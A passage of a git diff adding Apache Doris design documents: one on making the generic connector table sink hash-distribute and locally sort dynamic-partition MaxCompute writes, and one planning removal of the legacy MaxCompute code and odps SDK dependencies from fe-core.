**full-schema** + order (`getOutputProjectByCoercion(table.getFullSchema(), ...)`), so legacy + `PhysicalMaxComputeTableSink` can index `child().getOutput().get(fullSchemaIdx)`. +- The generic `bindConnectorTableSink` (`BindSink.java:949-950`) projects the child to **`bindColumns`** + order (`getOutputProjectByCoercion(bindColumns, ...)`), where `bindColumns == boundSink.getCols()`, + and enforces `cols.size() == child.getOutput().size()` (`:941`). So for the generic sink + `child().getOutput().get(i)` corresponds to **`cols.get(i)`**, NOT to `fullSchema.get(i)`. + +Therefore the generic sink finds each partition column by its index **in `cols`** and reads the +aligned child output slot at the same index: + +```java +@Override +public PhysicalProperties getRequirePhysicalProperties() { + if (!(targetTable instanceof PluginDrivenExternalTable)) { + return PhysicalProperties.GATHER; + } + PluginDrivenExternalTable table = (PluginDrivenExternalTable) targetTable; + + // Branch 1 — dynamic-partition write that the connector requires to be hash-distributed and + // locally sorted by partition columns (MaxCompute Storage API streams partition writers and + // errors on unsorted multi-partition data — mirrors legacy PhysicalMaxComputeTableSink). + if (table.requirePartitionLocalSortOnWrite()) { + Set partitionNames = table.getPartitionColumns().stream() + .map(Column::getName).collect(Collectors.toSet()); + if (!partitionNames.isEmpty()) { + // Index by cols (== child output alignment for the connector sink), NOT full schema. + List partitionColIdx = new ArrayList<>(); + for (int i = 0; i < cols.size(); i++) { + if (partitionNames.contains(cols.get(i).getName())) { + partitionColIdx.add(i); + } + } + if (!partitionColIdx.isEmpty()) { // a partition col present in cols == dynamic write + List exprIds = partitionColIdx.stream() + .map(idx -> child().getOutput().get(idx).getExprId()) + .collect(Collectors.toList()); + DistributionSpecHiveTableSinkHashPartitioned shuffleInfo = + new DistributionSpecHiveTableSinkHashPartitioned(); + shuffleInfo.setOutputColExprIds(exprIds); + List orderKeys = partitionColIdx.stream() + .map(idx -> new OrderKey(child().getOutput().get(idx), true, false)) + .collect(Collectors.toList()); + return new PhysicalProperties(shuffleInfo) + .withOrderSpec(new MustLocalSortOrderSpec(orderKeys)); + } + // partition cols exist but none in cols == all-static: fall through. + } + } + + // Branch 2/3 — non-partition or all-static: parallel writers if the connector supports it. + if (table.supportsParallelWrite()) { + return PhysicalProperties.SINK_RANDOM_PARTITIONED; + } + return PhysicalProperties.GATHER; +} +``` + +Result mapping: + +| table / write shape | caps declared | output | legacy parity | +|---|---|---|---| +| MaxCompute, dynamic partition | both | hash(part) + local-sort(part) | ✅ = legacy branch-1 | +| MaxCompute, all-static partition | both | `SINK_RANDOM_PARTITIONED` | ✅ = legacy branch-2 | +| MaxCompute, non-partitioned | both | `SINK_RANDOM_PARTITIONED` | ✅ = legacy branch-3 | +| jdbc / es / trino | none | `GATHER` | ✅ unchanged | + +### Why no change is needed in `RequestPropertyDeriver` + +`RequestPropertyDeriver.visitPhysicalConnectorTableSink():212-227` already routes correctly: +`GATHER → GATHER`; else (with `enableStrictConsistencyDml`, default **true** — +`SessionVariable.java:1566`) `→ getRequirePhysicalProperties()` to children. So once +`getRequirePhysicalProperties()` returns hash+local-sort, the deriver enforces it (inserts the +shuffle + local sort) exactly as it does for legacy `visitPhysicalMaxComputeTableSink():180-188`. The +non-strict (`enable_strict_consistency_dml=false`) path pushes `ANY` for **both** legacy MC and the +generic connector sink — i.e. it drops the requirement identically in legacy and cutover, so it is a +pre-existing parity, not a regression introduced here. (A user who turns off strict-consistency DML +loses local-sort on dynamic partitions in legacy too; default-on covers the common case.) + +### Known minor divergence — `ShuffleKeyPruner` (documented, not fixed here) + +`ShuffleKeyPruner.visitPhysicalConnectorTableSink():286-295` lacks the non-strict short-circuit that +`visitPhysicalMaxComputeTableSink():272-283` has. In the **default strict** mode both compute +`childAllowShuffleKeyPrune = required.equals(ANY)` → `false` for a dynamic-partition write → **identical +behavior**. They diverge **only** when `enable_strict_consistency_dml=false`: legacy prunes shuffle keys +(`true`), generic does not (`required` is hash+sort ≠ `ANY` → `false`). The generic path therefore +prunes **less** (more conservative) — a missed optimization, never a correctness issue, and it is +**pre-existing** (the generic branch already differs; this fix does not introduce it). Recorded as a +minor deviation; aligning it would touch the shared connector branch for jdbc/es and is out of scope. + +### Coupling with P0-3 (FIX-BIND-STATIC-PARTITION) — correct either way, fully exercised only after P0-3 + +The dynamic/static detection reads `cols` and relies on the contract *"static partition columns are +excluded from `cols`"* — the same contract legacy `getRequirePhysicalProperties()` relies on (legacy +`bindMaxComputeTableSink:876-879` excludes them). The generic `bindConnectorTableSink` does **not** yet +exclude them (that is the P0-3 bug, NG-3). Consequences, both **safe**: + +- `INSERT INTO mc PARTITION(p='x') SELECT ` (no column list, all-static): today + this **fails at bind** (`cols` includes `p`, child output excludes it → `:941` count mismatch + throws) — so `getRequirePhysicalProperties()` is **never reached**. After P0-3, `cols` excludes the + static `p` → branch falls through to `SINK_RANDOM_PARTITIONED`. ✅ either way. +- `INSERT INTO mc PARTITION(p) SELECT ... , p_val` (dynamic): `p` is in `cols` → branch-1 + hash+local-sort. ✅ today and after P0-3. +- Mixed `PARTITION(p1='x', p2) SELECT ...`: after P0-3, `cols` excludes static `p1`, includes dynamic + `p2` → hash+sort by `p2` only. Legacy hashes+sorts by `{p1,p2}` but `p1` is a projected constant, so + `{p2}` ≡ `{p1,p2}` for grouping. ✅ functionally equivalent. + +So **this fix is correct regardless of P0-3 ordering**; it is merely not *exercised* for the all-static +no-column-list shape until P0-3 lands. Documented; no ordering constraint imposed on P0-3. + +> **Forward-pointer (from the P0-2 clean-room review, 2026-06-07 — survivors F2/F4/F5 all +> `known-degradation`, `matchesDesignIntent=true`, 0 must-fix):** when **P0-3 / FIX-BIND-STATIC-PARTITION** +> lands, add a Rule-9 integration regression that `INSERT INTO mc PARTITION(p='x') SELECT cols>` (no column list) **binds without throwing** AND `getRequirePhysicalProperties()` then returns +> `SINK_RANDOM_PARTITIONED` (the all-static branch fully exercised end-to-end). Until then, T2 +> (`allStaticPartitionWriteUsesRandomPartitioned`) unit-tests that branch over a cols-already-stripped +> input (reachable today only via the explicit-column-list static form — see the test's Javadoc). +> **Batch-D red-line:** do not delete legacy `PhysicalMaxComputeTableSink` (sole logical copy) until +> *both* this fix and P0-3 have landed, else all-static parity is lost before it is end-to-end exercised. + +### Alternatives considered + +- **(B) Derive implicitly — no new capability** (`supportsParallelWrite() && hasPartitionCols && + dynamic → hash+local-sort`). Simpler (Rule 2), but forces the MaxCompute Storage-API local-sort + policy on **every** future parallel-write partitioned connector, even ones that buffer per-partition + and don't need it (an unnecessary sort cost). Rejected: conflates two orthogonal facts; the + re-review §A.NG-2 处置 and the HANDOFF explicitly call for a *connector-declared* "distribution+sort" + hook, not an implicit universal default. +- **(C) Method on `ConnectorWriteOps`** (`requirePartitionLocalSortOnWrite()`), mirroring + FIX-OVERWRITE-GATE's `supportsInsertOverwrite()`. Works, but reading it from the sink needs a + `ConnectorSession` + `getMetadata(...)` round-trip inside property derivation, whereas the sibling + `supportsParallelWrite()` read in the same method uses the cheaper `getCapabilities()` set. Rejected + for inconsistency + hot-path cost; the capability is a static connector property, which is exactly + what `ConnectorCapability` is for. +- **(A, chosen) New `ConnectorCapability` enum value.** Consistent with the sibling read, cheap, + opt-in, matches the HANDOFF guidance. The enum already carries planner-distribution semantics + (`SUPPORTS_PARALLEL_WRITE`'s own doc-comment describes GATHER-vs-parallel), so a sibling + distribution capability fits. + +## Implementation Plan + +**File 1 — `fe/fe-connector/fe-connector-api/.../ConnectorCapability.java`** +Append a new enum value after `SUPPORTS_PARALLEL_WRITE` (`:51`): + +```java + /** + * Indicates the connector requires dynamic-partition writes to be hash-distributed by + * partition columns and locally sorted by them before reaching the sink. + * + *

Streaming partition writers (e.g. MaxCompute Storage API) close the previous partition + * writer when a new partition value appears; un-grouped rows cause "writer has been closed" + * errors. A connector declaring this is expected to also declare {@link #SUPPORTS_PARALLEL_WRITE}.

+ */ + SINK_REQUIRE_PARTITION_LOCAL_SORT +``` + +**File 2 — `fe/fe-connector/fe-connector-maxcompute/.../MaxComputeDorisConnector.java`** +Add `getCapabilities()` override (currently absent → empty set): + +```java +@Override +public Set getCapabilities() { + return EnumSet.of(ConnectorCapability.SUPPORTS_PARALLEL_WRITE, + ConnectorCapability.SINK_REQUIRE_PARTITION_LOCAL_SORT); +} +``` +Imports: `org.apache.doris.connector.api.ConnectorCapability`, `java.util.EnumSet`, `java.util.Set`. + +**File 3 — `fe/fe-core/.../datasource/PluginDrivenExternalTable.java`** +Add a sibling to `supportsParallelWrite()` (`:78-85`): + +```java +public boolean requirePartitionLocalSortOnWrite() { + if (!(catalog instanceof PluginDrivenExternalCatalog)) { + return false; + } + Connector connector = ((PluginDrivenExternalCatalog) catalog).getConnector(); + return connector != null + && connector.getCapabilities().contains(ConnectorCapability.SINK_REQUIRE_PARTITION_LOCAL_SORT); +} +``` +(No new import — `ConnectorCapability` already imported `:26`.) + +**File 4 — `fe/fe-core/.../physical/PhysicalConnectorTableSink.java`** +Replace `getRequirePhysicalProperties()` (`:114-121`) with the 3-branch (cols-indexed) logic above. +New imports (mirror `PhysicalMaxComputeTableSink`'s import block): +`DistributionSpecHiveTableSinkHashPartitioned`, `MustLocalSortOrderSpec`, `OrderKey`, `ExprId`, +`java.util.ArrayList`, `java.util.Set`, `java.util.stream.Collectors`. Update the method Javadoc to +describe all three branches. + +**No change** to `RequestPropertyDeriver`, `PhysicalPlanTranslator`, `BindSink`, or the BE/thrift sink. + +## Risk Analysis + +- **Blast radius of declaring `SUPPORTS_PARALLEL_WRITE` for MaxCompute:** the capability has exactly + **two** readers in the tree — `PluginDrivenExternalTable.supportsParallelWrite()` and + `PhysicalConnectorTableSink:117` (verified by grep). The new capability has one reader (the new table + method). So flipping both **only** affects `getRequirePhysicalProperties()` and its two consumers + (`RequestPropertyDeriver`, `ShuffleKeyPruner`), both analyzed above. No DDL/read/transaction path + reads these capabilities. Other connectors are untouched (they declare neither). +- **Index-by-cols correctness** is the highest-risk element (a verbatim copy of legacy that indexed by + full-schema would be wrong/out-of-bounds for the connector sink). Covered by the design note above + and pinned by the UT (dynamic-partition exprIds must equal the *cols-position* child slots). +- **`enable_strict_consistency_dml=false`** path drops the requirement (pushes ANY) — **parity with + legacy**, not a new regression. Documented. +- **Batch-D red-line (🔴):** `PhysicalMaxComputeTableSink` is the **sole** logical copy of this + hash+local-sort logic. Batch-D must not delete it until this fix lands the equivalent in the generic + sink + MaxCompute capability declaration. Ordering: this fix **before** the Batch-D delete of + `PhysicalMaxComputeTableSink`. Doc-sync flag below. +- **Truth-gate remaining (live e2e):** unit tests prove `getRequirePhysicalProperties()` returns the + right spec; they do **not** prove BE actually avoids "writer has been closed" end-to-end. Per + re-review §E#6 that requires **live INSERT across multiple dynamic partitions against real ODPS** + (CI-skipped). This fix is necessary-but-not-sufficient until run live alongside P0-3. + +## Test Plan + +### Unit Tests + +**Location:** new `fe/fe-core/src/test/java/org/apache/doris/nereids/trees/plans/physical/PhysicalConnectorTableSinkTest.java`. + +`getRequirePhysicalProperties()` reads protected-final fields `targetTable`, `cols` and calls +`child()`. Construct the sink with the project's established pattern (memory +`catalog-spi-fe-core-test-infra`): `Mockito.mock(PhysicalConnectorTableSink.class, CALLS_REAL_METHODS)` +to skip the ctor, `Deencapsulation.setField(sink, "targetTable"/"cols", ...)` to inject finals, and +`Mockito.doReturn(childPlan).when(sink).child()` (childPlan = a mock `Plan` whose `getOutput()` +returns hand-built `SlotReference`s aligned 1:1 with `cols`). The `PluginDrivenExternalTable` is built +with the `TestablePluginCatalog` + `tableWithCacheValue` pattern from +`PluginDrivenExternalTablePartitionTest`, and its mock `Connector.getCapabilities()` is stubbed per +case. No Doris env needed. + +- **T1 `dynamicPartitionWriteRequiresHashAndLocalSort` (the Rule-9 red-before/green-after gate):** + partitioned table (`part` ∈ schema), caps = {PARALLEL_WRITE, REQUIRE_PARTITION_LOCAL_SORT}, `cols` + **includes** `part`. Assert result distribution is `DistributionSpecHiveTableSinkHashPartitioned` + whose `getOutputColExprIds()` equals the ExprId of the **cols-position** child slot for `part`, AND + the order spec is `MustLocalSortOrderSpec` over that same slot. **Why it encodes intent (Rule 9):** + asserts the business invariant "dynamic-partition MaxCompute writes are grouped per partition so the + Storage API does not hit 'writer has been closed'." **Mutation:** revert + `getRequirePhysicalProperties()` to the old `supportsParallelWrite? RANDOM : GATHER` → result is + `SINK_RANDOM_PARTITIONED` (no order spec) → red. Also: an index-by-full-schema mutation maps to the + wrong/out-of-range slot → red. +- **T2 `allStaticPartitionWriteUsesRandomPartitioned`:** partitioned table, both caps, `cols` + **excludes** all partition cols → assert `SINK_RANDOM_PARTITIONED` (no order spec). Pins the + static-vs-dynamic detection (mutation dropping the `partitionColIdx.isEmpty()` fall-through would + red). +- **T3 `nonPartitionedWriteUsesRandomWhenParallel`:** no partition cols, both caps → assert + `SINK_RANDOM_PARTITIONED`. (NG-4 parity for non-partitioned tables.) +- **T4 `nonParallelConnectorGathers`:** table with **no** capabilities (jdbc-like) → assert `GATHER`. + Guards that the change did not broaden parallel/sort behavior to capability-less connectors. + +### E2E Tests + +Out of scope for this loop (per the round process: compile+UT, no e2e). The real truth-gate — +`INSERT` across **multiple dynamic partitions** against real ODPS asserting no `"writer has been +closed"` + parallel throughput on non-partitioned writes — requires live ODPS credentials and is +CI-skipped. Recorded as the remaining live gate (alongside P0-3 / FIX-OVERWRITE-GATE). + +## Doc-sync (with or after this fix) + +- **Batch-D red-line** (`P4-batchD-maxcompute-removal-design.md`): the delete of + `PhysicalMaxComputeTableSink` must be ordered **after** this fix (sole logical copy of write + distribution). Confirm the "zero survivor" claim accounts for the new generic-sink + capability path. +- **decisions-log / deviations-log:** register the new `ConnectorCapability.SINK_REQUIRE_PARTITION_LOCAL_SORT` + + MaxCompute capability set; register the `ShuffleKeyPruner` non-strict minor deviation; register the + `enable_strict_consistency_dml=false` parity note. +- **task-list-P4-rereview.md:** flip P0-2 progress + append the review-rounds cumulative conclusion. diff --git a/plan-doc/tasks/designs/P4-batchD-maxcompute-removal-design.md b/plan-doc/tasks/designs/P4-batchD-maxcompute-removal-design.md new file mode 100644 index 00000000000000..bcd177c994153e --- /dev/null +++ b/plan-doc/tasks/designs/P4-batchD-maxcompute-removal-design.md @@ -0,0 +1,237 @@ +# P4 Batch D — MaxCompute legacy removal + fe-core odps-dep drop (design) + +> **Design-first, verified.** Closure produced 2026-06-07 by a parallel re-grep + adversarial-verify +> workflow (OQ-3 "入口先完整 re-grep" satisfied). Full per-line detail (84 refs) saved at the recon +> output `tasks/wzlnjgj64.output` (session transcript). This doc is the execution source for +> P4-T07/T08/T09 + the fe-core pom drop. +> **Gate before executing any of this:** the user must report the live ODPS cutover test green +> (`OdpsLiveConnectivityTest` + manual smoke) — per [D-027], removal is sequenced *after* +> live-validation so the T06b flip stays independently revertable until then. +> Mirrors the completed trino-connector removal: `524097e38d3` (code) + `c4ac2c5911d` (pom drop). +> +> ⚠️ **[D-028] UPDATE (2026-06-07) — gate raised + §2 amended.** Live-verification recon (code-verified) +> found the cutover **functionally incomplete**: only read(SELECT)/CREATE TABLE/write(INSERT) route +> through SPI; **DROP TABLE / CREATE DB / DROP DB / SHOW PARTITIONS / partitions() TVF FE-dispatch was +> never wired** (connector impls exist since P4-T01/T02, FE has zero callers). So **P4-T06c must land +> first** (wire those FE sites to the SPI, generically on `PluginDrivenExternalCatalog`), then live +> verification must be **all-green**, *then* Batch D. Consequence for §2: the `ShowPartitionsCommand` +> / `MetadataGenerator` / `PartitionsTableValuedFunction` entries change from **delete-branch** to +> **delete only the residual legacy `MaxComputeExternalCatalog` reference** — the working dispatch is +> the `PluginDrivenExternalCatalog` branch T06c adds (do NOT delete that). See §2 note. + +--- + +## 0. Why / scope + +After the T06b flip ([P4-T06b]), a `max_compute` catalog deserializes to `PluginDrivenExternalCatalog` +/ `PluginDrivenExternalTable`; **no legacy `MaxComputeExternal*` object is ever instantiated again** +(factory case gone, GSON → `PluginDriven*` via T05). The entire legacy MaxCompute subsystem in +fe-core is therefore dead code. Removing it is the only way to drop fe-core's `odps-sdk-*` jars +(the user's requirement): the two deps are reachable **only** through that legacy code (7 files +`import com.aliyun.odps.*`, all under the deletion set; `feCoreOdpsResidualAfterDeletion` = ∅). + +Batch D = **T07** (clean mechanical reverse-refs) + **T08** (clean live reverse-refs + verify +`MCInsertExecutor` dead, OQ-1) + **T09** (delete legacy dir + plumbing + tests) + **pom drop**. +In practice the reverse-ref removal and the file deletion must land as **one compiling unit** +(every `instanceof MaxCompute*` references a class symbol — Java does not dead-strip source refs). + +--- + +## 1. Deletion set — 20 fe-core files (all verified dead-after-flip, zero survivor risks) + +> **⚠️ 红线限定(P3-11 补,2026-06-08)— `source/MaxComputeScanNode`:** 「zero survivor / dead-after-flip」 +> 仅就**实例化链**成立;该类还承载三段**行为逻辑副本**,删除前各须有 PluginDriven 侧 live 等价物: +> ① **读裁剪**(`MaxComputeScanNode:718-731`)—— 已由 FIX-PRUNE-PUSHDOWN(`072cd545c54` / [D-031])清除; +> ② **batch-mode 异步分批 split**(`MaxComputeScanNode:214-298`)—— 已由 FIX-BATCH-MODE-SPLIT(`ac8f0fc15eb` / +> [D-035])在 `PluginDrivenScanNode` 落通用等价;③ **LIMIT-split 优化**(`MaxComputeScanNode` 内第 3 段行为副本) +> —— 通用等价已在 P3-9 / 连接器 `MaxComputeScanPlanProvider`(session var `ENABLE_MC_LIMIT_SPLIT_OPTIMIZATION` +> 门控,commit `952b08e0cc8`)落地(**DOC task 2026-06-09 补**:原注只列 ①② 漏此第 3 副本)。三者**均已落**,故本类现可纳入删除单元;但删前仍须 live e2e +> 终验([D-027] Batch-D 执行门)。交叉引用 HANDOFF §横切「Batch-D 红线扩充」+ 各 per-fix 红线。 + +**`datasource/maxcompute/` (10):** `MaxComputeExternalCatalog`, `MaxComputeExternalDatabase`, +`MaxComputeExternalTable`, `MaxComputeMetadataOps`, `MaxComputeExternalMetaCache`, +`MaxComputeSchemaCacheValue`, `McStructureHelper` (+inner `ProjectSchemaTableHelper`/`ProjectTableHelper`), +`MCTransaction`, `source/MaxComputeScanNode`, `source/MaxComputeSplit`. + +**Write/txn plumbing (8):** +- `planner/MaxComputeTableSink` +- `nereids/trees/plans/logical/LogicalMaxComputeTableSink` +- `nereids/trees/plans/physical/PhysicalMaxComputeTableSink` +- `nereids/analyzer/UnboundMaxComputeTableSink` +- `nereids/trees/plans/commands/insert/MCInsertExecutor` *(OQ-1: confirm dead — only built from `instanceof UnboundMaxComputeTableSink`/`PhysicalMaxComputeTableSink`, both gone)* +- `nereids/trees/plans/commands/insert/MCInsertCommandContext` +- `nereids/rules/implementation/LogicalMaxComputeTableSinkToPhysicalMaxComputeTableSink` +- `transaction/MCTransactionManager` + +**Tests (2, deleted whole):** `datasource/maxcompute/MaxComputeExternalMetaCacheTest`, +`datasource/maxcompute/source/MaxComputeScanNodeTest`. + +Instantiation-chain proof (all roots dead post-flip): `MaxComputeExternalCatalog` was built **only** +at `CatalogFactory:147` (removed by flip); everything else is reachable only from it or via +`instanceof MaxCompute*` gates that become false. `MaxComputeScanNode` only via +`instanceof MaxComputeExternalTable`. The sinks/executor/context/rule only via `instanceof` on +`UnboundMaxComputeTableSink` / `PhysicalMaxComputeTableSink` / `LogicalMaxComputeTableSink`. + +--- + +## 2. Reverse-ref cleanup — ~30 files, 84 refs (32 remove-import · 43 delete-branch · 9 keep) + +> ⚠️ **[D-028] amendment:** for the 3 partition/show dispatch sites below — +> `ShowPartitionsCommand` (:203/:286/:415), `MetadataGenerator` (:1310/:1337 `dealMaxComputeCatalog`), +> `PartitionsTableValuedFunction` (:173/:200) — **P4-T06c adds a `PluginDrivenExternalCatalog` branch +> that routes to the connector SPI** (the actual functionality). After T06c, Batch D must **delete +> only the residual legacy `MaxComputeExternalCatalog`/`MaxComputeExternalTable` branch + import**, and +> **KEEP** the new PluginDriven branch. (Pre-T06c this table said "delete-branch" outright, which would +> have permanently broken SHOW PARTITIONS / partitions TVF — see [D-028].) The DDL gap (createDb/dropDb/ +> dropTable) is fixed by T06c via `PluginDrivenExternalCatalog` overrides, not by any §2 edit here. + +Per file (edit, NOT delete) — remove the import(s) + delete the now-dead `instanceof`/visitor/rule branch: + +| File | What to remove | +|---|---| +| `datasource/CatalogFactory.java` | *(done in T06b: import + case)* | +| `datasource/ExternalCatalog.java` | import + `MaxComputeExternalDatabase` db-build branch (~:939) → mirror JDBC/trino (`PluginDrivenExternalDatabase`) | +| `datasource/ExternalMetaCacheMgr.java` | import + **eager** `MaxComputeExternalMetaCache` registration (~:183 + :310) — ⚠ constructed at ctor, must be removed (adversarial finding) | +| `datasource/metacache/ExternalMetaCacheRouteResolver.java` | import + `instanceof MaxComputeExternalCatalog` (~:75) | +| `nereids/analyzer/UnboundTableSinkCreator.java` | import + 3× `instanceof MaxComputeExternalCatalog` branches (:66/:105/:146) | +| `nereids/glue/translator/PhysicalPlanTranslator.java` | 4 imports + `visitPhysicalMaxComputeTableSink` (~:593) + `instanceof MaxComputeExternalTable` scan branch (~:795) | +| `nereids/rules/analysis/BindSink.java` | 4 imports + `unboundMaxComputeTableSink`/`bindMaxComputeTableSink`/`bind`/`instanceof MaxComputeExternalTable` branches (~:170/:863/:1078/:1084) | +| `nereids/trees/plans/commands/insert/InsertIntoTableCommand.java` | 3 imports + `instanceof PhysicalMaxComputeTableSink` MCInsertExecutor branch (~:562) | +| `nereids/trees/plans/commands/insert/InsertOverwriteTableCommand.java` | 2 imports + `instanceof MaxComputeExternalTable` (~:321) + `instanceof UnboundMaxComputeTableSink` (~:399) | +| `nereids/trees/plans/commands/insert/InsertUtils.java` | import + 2× `instanceof UnboundMaxComputeTableSink` (~:380/:607) | +| `nereids/trees/plans/visitor/SinkVisitor.java` | 3 imports + 3 visit methods (Unbound/Logical/Physical, ~:104/:136/:200) | +| `nereids/processor/post/ShuffleKeyPruner.java` | import + `visitPhysicalMaxComputeTableSink` (~:272) | +| `nereids/processor/pre/TurnOffPageCacheForInsertIntoSelect.java` | import + `visitLogicalMaxComputeTableSink` (~:72) | +| `nereids/properties/RequestPropertyDeriver.java` | import + `visitPhysicalMaxComputeTableSink` (~:180) | +| `nereids/rules/RuleSet.java` | import + 2× `LogicalMaxComputeTableSinkToPhysicalMaxComputeTableSink` registration (~:233/:281) | +| `nereids/rules/expression/ExpressionRewrite.java` | `LogicalMaxComputeTableSinkRewrite` entries (~:113/:522) | +| `nereids/trees/plans/commands/ShowPartitionsCommand.java` | import + `instanceof MaxComputeExternalCatalog` (:203/:415) + `handleShowMaxComputeTablePartitions` (~:286) | +| `nereids/trees/plans/commands/info/CreateTableInfo.java` | import + 2× `instanceof MaxComputeExternalCatalog` (~:390/:912) | +| `tablefunction/MetadataGenerator.java` | import + `instanceof MaxComputeExternalCatalog` (~:1310) + `dealMaxComputeCatalog` (~:1337) | +| `tablefunction/PartitionsTableValuedFunction.java` | 2 imports + `instanceof MaxComputeExternalCatalog`/`Table` (~:173/:200) | +| `tablefunction/PartitionValuesTableValuedFunction.java` | import + `instanceof MaxComputeExternalCatalog` (~:115) | +| `transaction/TransactionManagerFactory.java` | import + `createMCTransactionManager` branch (~:38) | + +**Test trims (~6):** `ExternalMetaCacheRouteResolverTest`, `CommitDataSerializerTest` (MCTransaction +case), `FrontendServiceImplTest` (testGetMaxComputeBlockIdRange — keep if it exercises the *plugin* +RPC; only drop the legacy-MCTransaction wiring), `PluginDrivenExternalTableEngineTest` +(keeps the max_compute engine cases — those are plugin, NOT legacy; re-check before trimming), +`PluginDrivenInsertExecutorTest`, `PluginDrivenTableSinkBindingTest` (comment only). +⚠ Re-verify each test against the keep-set before editing — several "MaxCompute" test refs are the +**plugin** path (keep), not legacy. + +--- + +## 3. KEEP set — image / plan / thrift compat (do NOT delete) + +- `catalog/TableIf.TableType.MAX_COMPUTE_EXTERNAL_TABLE` — used by `PluginDrivenExternalTable` post-flip + old-image replay. +- `datasource/InitCatalogLog.Type.MAX_COMPUTE`, `datasource/InitDatabaseLog.Type.MAX_COMPUTE` — init-log replay (`legacyLogTypeToCatalogType` default → `"max_compute"`). +- `transaction/TransactionType.MAXCOMPUTE` — plugin executor `transactionType()` returns it (T06a) + state persistence. +- `datasource/TableFormatType.MAX_COMPUTE` — `PluginDrivenExternalTable.getTableFormatType()`. +- `persist/gson/GsonUtils` 3× `registerCompatibleSubtype("MaxComputeExternal{Catalog,Database,Table}")` — T05 image compat (string literals only, no odps). +- `nereids/.../PlanType.{LOGICAL,LOGICAL_UNBOUND,PHYSICAL}_MAX_COMPUTE_TABLE_SINK`, + `nereids/rules/RuleType.{BINDING_INSERT_MAX_COMPUTE_TABLE, LOGICAL_MAX_COMPUTE_TABLE_SINK_TO_PHYSICAL...}` — + enum constants; leave them (harmless dormant; removing risks churn). They become unused once the + classes are deleted; that is fine. +- `service/FrontendServiceImpl.getMaxComputeBlockIdRange` + `TMaxComputeBlockIdRequest/Result` thrift — + **the plugin write path's BE→FE block-alloc RPC** (T06a), NOT legacy. Keep. +- `transaction/PluginDrivenTransactionManager` — the live txn manager (T06a). Keep. +- `datasource/PluginDrivenExternalTable` `max_compute` engine cases (T05) + `PluginDrivenExternalCatalog.legacyLogTypeToCatalogType` default (no MC case). Keep. +- `fe-common` `common/maxcompute/MCProperties` — **KEEP**(odps-free 常量;`DatasourcePrintableMap` 仅引它、无 odps)。 + `MCUtils` —— **不再属 KEEP**:见 **§8**(方案 A,2026-06-09 用户定),删 legacy 后下沉到 be-java-extensions、并删 fe-common 的 odps(使 fe-core 依赖树彻底无 odps)。 + +--- + +## 4. pom drop (mirror `c4ac2c5911d`) + +`fe/fe-core/pom.xml` — remove the two dependency blocks (~lines 362–381): +`com.aliyun.odps:odps-sdk-core` (with its ``) and `com.aliyun.odps:odps-sdk-table-api`. +After deletion fe-core has **zero** odps source refs. fe-core still receives `odps-sdk-core` +**transitively via fe-common** (which keeps it for `MCUtils`) — accepted per [D-027] decision 2 +(direct-declarations-only). `odps-sdk-table-api` is fe-core-only and disappears entirely from +fe-core's classpath. Verify with `mvn -pl :fe-core dependency:tree | grep odps` (expect only the +transitive `odps-sdk-core` via fe-common). + +--- + +## 5. Ordered TODO (execute after live-validation gate) + +> ✅ **EXECUTED 2026-06-09** (branch `catalog-spi-06`, off upstream `9ed49571b20` / #64253). Steps 1–6 landed in 2 commits: `7a4db351100` (delete 20 files + reverse-refs + test trims/rewires) and `409300a75b8` (drop fe-core+fe-common odps, sink MCUtils into be-java-ext). All gates green: test-compile (main+test), checkstyle 0, import-gate, grep-empty (`com.aliyun.odps` in fe-core/src = ∅, no non-comment refs), and `mvn -pl :fe-core dependency:tree | grep odps` = ∅. §8 surfaced a hidden transitive leak — odps-sdk-core was also providing netty/protobuf to fe-common's own DorisHttpException/GsonUtilsBase; fixed by declaring them directly (see [DV-022]). Step 7 (doc-sync) = this update + PROGRESS/HANDOFF/deviations-log. + +1. **T07+T08+T09 as one compiling change:** apply all §2 edits (imports + dead branches) **and** + delete the §1 20 files together. Keep §3 untouched. +2. Trim §2 test files (re-verify each against §3 keep-set first). +3. Gate: `mvn -f fe/pom.xml -pl :fe-core -am -Dmaven.build.cache.enabled=false -Dcheckstyle.skip=true + -DskipTests test-compile` (compiles main+test against odps-less-of-legacy classpath; read real + `BUILD`/`MVN_EXIT`) → `checkstyle:check` → `bash tools/check-connector-imports.sh`. +4. Grep-empty assertion (acceptance): `grep -rn "MaxComputeExternal\|MCTransaction\b\|MCInsert" fe/fe-core/src/main` returns **only** the §3 keep-set lines (enums/gson/thrift/plugin). `grep -rn "com.aliyun.odps" fe/fe-core/src` → empty. +5. Commit `[P4-T07/T08/T09] remove legacy MaxCompute subsystem from fe-core`. +6. **pom drop** (§4) **+ fe-common 解耦** (§8):remove fe-core 的两个 odps 块;**并**按 §8 下沉 `MCUtils` + 到 be-java-ext + 删 `fe-common/pom.xml` 的 `odps-sdk-core`。re-run test-compile (BUILD SUCCESS) + + `dependency:tree | grep odps` = **∅**。Commit `[P4-T09] drop fe-core odps + sink MCUtils into BE ext, drop fe-common odps`. +7. doc-sync 5 steps (PROGRESS / tasks-P4 / connectors-maxcompute / decisions / deviations) + grep-empty + evidence in the 阶段日志. + +--- + +## 6. Risks + +| Risk | Mitigation | +|---|---| +| Missed reverse-ref → compile break | §2 is the verified 84-ref closure; gate test-compile catches any residue. | +| Deleting a *plugin*-path symbol thinking it's legacy | §3 keep-set is explicit; re-verify each "MaxCompute" test/thrift ref before touching. | +| `ExternalMetaCacheMgr` eager init NPE/CNFE | §2 flags the ctor-time registration — remove the line, do not assume dead-strip. | +| `MCInsertExecutor` still reachable (OQ-1) | Verified: only built from now-dead `instanceof` gates; confirm with the grep-empty step before deleting. | +| Removing fe-core odps breaks an unseen consumer | `feCoreOdpsResidualAfterDeletion` = ∅; `dependency:tree` + test-compile confirm. | + +--- + +## 7. 现状校验 + 范围确认 + 前置门(2026-06-09,design-only refresh) + +> 2026-06-09 session 增补:用户要求「完整移除 fe-core 下老的 maxcompute(零代码 + 零依赖)」。本 session **只分析 + finalize 方案 + 确认前置,不动代码**(用户定:实际删除放下个 session)。 + +### 7.1 用户范围定夺(2026-06-09)= 重申 [D-027] +- **Q1 = 只删老实现(本 Batch-D),非 full-purge。** 保留服务于新 SPI 插件路径的 `max_compute` 词元(§3 KEEP 集:`TableType.MAX_COMPUTE_EXTERNAL_TABLE` / `TransactionType.MAXCOMPUTE` / `TableFormatType.MAX_COMPUTE` / block-id thrift `TMaxComputeBlockId*` / session var `ENABLE_MC_LIMIT_SPLIT_OPTIMIZATION` / `ConnectorSessionBuilder` 的 `max_compute_write_max_block_count` 注入 / `DatasourcePrintableMap`→`MCProperties` / GsonUtils 镜像兼容串)—— 这些是 live 路径在用,非 legacy。 +- 